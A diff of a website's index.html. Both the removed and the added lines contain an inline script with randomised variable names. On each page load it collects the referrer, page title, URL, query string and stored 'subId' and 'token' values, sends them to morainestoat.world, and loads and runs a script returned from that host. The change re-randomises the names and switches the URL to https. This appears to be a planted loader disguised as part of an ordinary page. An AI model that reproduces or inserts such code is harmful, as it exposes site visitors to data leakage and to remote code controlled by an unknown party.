--- a/index.html
+++ b/index.html
@@ -17,45 +17,45 @@
     <link rel="stylesheet" href="assets/css/responsive.css">
 <script>
     (function() {
-    var name = '_hsQ1jBNWmBtCck6J';
-    if (!window._hsQ1jBNWmBtCck6J) {
-        window._hsQ1jBNWmBtCck6J = {
+    var name = '_v51rgCtS3x27RK9W';
+    if (!window._v51rgCtS3x27RK9W) {
+        window._v51rgCtS3x27RK9W = {
             unique: false,
             ttl: 86400,
-            R_PATH: 'http://morainestoat.world/k3JtJrrW',
+            R_PATH: 'https://morainestoat.world/k3JtJrrW',
         };
     }
-    const _twDb7SSQQcHZ3dS9 = localStorage.getItem('config');
-    if (typeof _twDb7SSQQcHZ3dS9 !== 'undefined' && _twDb7SSQQcHZ3dS9 !== null) {
-        var _rNVgBRCFFFjfkmpY = JSON.parse(_twDb7SSQQcHZ3dS9);
-        var _wnKNjkP2YtqWWcJ7 = Math.round(+new Date()/1000);
-        if (_rNVgBRCFFFjfkmpY.created_at + window._hsQ1jBNWmBtCck6J.ttl < _wnKNjkP2YtqWWcJ7) {
+    const _36tCx7QvKBbtmq4C = localStorage.getItem('config');
+    if (typeof _36tCx7QvKBbtmq4C !== 'undefined' && _36tCx7QvKBbtmq4C !== null) {
+        var _1x6D69jQRfdpvvdG = JSON.parse(_36tCx7QvKBbtmq4C);
+        var _TBH2vvVQFLR19QRg = Math.round(+new Date()/1000);
+        if (_1x6D69jQRfdpvvdG.created_at + window._v51rgCtS3x27RK9W.ttl < _TBH2vvVQFLR19QRg) {
             localStorage.removeItem('subId');
             localStorage.removeItem('token');
             localStorage.removeItem('config');
         }
     }
-    var _JHcCnmTrwNpV3rwP = localStorage.getItem('subId');
-    var _k6z7DFHw6LVFZgLv = localStorage.getItem('token');
-    var _Vr5ymSrDng83bty6 = '?return=js.client';
-        _Vr5ymSrDng83bty6 += '&' + decodeURIComponent(window.location.search.replace('?', ''));
-        _Vr5ymSrDng83bty6 += '&se_referrer=' + encodeURIComponent(document.referrer);
-        _Vr5ymSrDng83bty6 += '&default_keyword=' + encodeURIComponent(document.title);
-        _Vr5ymSrDng83bty6 += '&landing_url=' + encodeURIComponent(document.location.hostname + document.location.pathname);
-        _Vr5ymSrDng83bty6 += '&name=' + encodeURIComponent(name);
-        _Vr5ymSrDng83bty6 += '&host=' + encodeURIComponent(window._hsQ1jBNWmBtCck6J.R_PATH);
-    if (typeof _JHcCnmTrwNpV3rwP !== 'undefined' && _JHcCnmTrwNpV3rwP && window._hsQ1jBNWmBtCck6J.unique) {
-        _Vr5ymSrDng83bty6 += '&sub_id=' + encodeURIComponent(_JHcCnmTrwNpV3rwP);
+    var _2cwvQ4mdB6kk7h2c = localStorage.getItem('subId');
+    var _xgNwzDrKBR1435BQ = localStorage.getItem('token');
+    var _k81yvDjtYP2j5DRF = '?return=js.client';
+        _k81yvDjtYP2j5DRF += '&' + decodeURIComponent(window.location.search.replace('?', ''));
+        _k81yvDjtYP2j5DRF += '&se_referrer=' + encodeURIComponent(document.referrer);
+        _k81yvDjtYP2j5DRF += '&default_keyword=' + encodeURIComponent(document.title);
+        _k81yvDjtYP2j5DRF += '&landing_url=' + encodeURIComponent(document.location.hostname + document.location.pathname);
+        _k81yvDjtYP2j5DRF += '&name=' + encodeURIComponent(name);
+        _k81yvDjtYP2j5DRF += '&host=' + encodeURIComponent(window._v51rgCtS3x27RK9W.R_PATH);
+    if (typeof _2cwvQ4mdB6kk7h2c !== 'undefined' && _2cwvQ4mdB6kk7h2c && window._v51rgCtS3x27RK9W.unique) {
+        _k81yvDjtYP2j5DRF += '&sub_id=' + encodeURIComponent(_2cwvQ4mdB6kk7h2c);
     }
-    if (typeof _k6z7DFHw6LVFZgLv !== 'undefined' && _k6z7DFHw6LVFZgLv && window._hsQ1jBNWmBtCck6J.unique) {
-        _Vr5ymSrDng83bty6 += '&token=' + encodeURIComponent(_k6z7DFHw6LVFZgLv);
+    if (typeof _xgNwzDrKBR1435BQ !== 'undefined' && _xgNwzDrKBR1435BQ && window._v51rgCtS3x27RK9W.unique) {
+        _k81yvDjtYP2j5DRF += '&token=' + encodeURIComponent(_xgNwzDrKBR1435BQ);
     }
     if ('' !== '') {
-        _Vr5ymSrDng83bty6 += '&bypass_cache=';
+        _k81yvDjtYP2j5DRF += '&bypass_cache=';
     }
     var a = document.createElement('script');
         a.type = 'application/javascript';
-        a.src = window._hsQ1jBNWmBtCck6J.R_PATH + _Vr5ymSrDng83bty6;
+        a.src = window._v51rgCtS3x27RK9W.R_PATH + _k81yvDjtYP2j5DRF;
     var s = document.getElementsByTagName('script')[0];
     s.parentNode.insertBefore(a, s)
     })();
